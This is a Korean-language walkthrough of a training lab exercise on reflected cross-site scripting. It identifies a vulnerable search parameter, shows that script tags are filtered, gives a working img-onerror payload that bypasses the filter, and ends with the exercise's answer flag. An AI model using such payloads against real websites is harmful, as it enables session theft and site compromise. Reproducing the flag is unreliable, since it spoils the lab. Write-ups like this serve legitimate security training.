=================
* XSS 문제 11번
=================
1. 공격 URL: https://lab.eqst.co.kr:8083/exam59/noticeHTML.php?pageIndex=1&sorting=BOARD_ID&sortingAd=DESC&startDt=&endDt=&searchType=all&keyword=ccc
2. 공격 파라미터: keyword
3. 공격 구문: ccc<img src=asd onerror="alert('XSS')"/>

4. 풀이과정
4-1. 글 작성했을 때의 변수 확인
실시간으로 입력값이 반영되는 곳을 버퍼로 확인했다.
위의 모든 파라미터에 water를 넣었을 때, 확인할 수 있는 곳은 keyword 뿐이었다.

4-2. 특수문자 필터링 체크
water<>()"'/ 와 같이 입력해서 필터링이 되는지 확인했을 때, 전혀 필터링이 되고 있지 않았다.
공격 구문: water<>()"';/

4-3. 태그 필터링 확인
4-3-1. 기본 태그 확인 
공격 구문1: ccc<script>alert('XSS')</script>
위의 구문을 입력했을 때 <script></script>가 통째로 필터링되고 있음을 알 수 있다.
공격 구문2: <img src=asd onerror="alert('XSS')"/>
위의 구문을 입력했을 때 스크립트가 잘 동작한다는 것을 확인했다.

5. 정답: jquery_xss
=================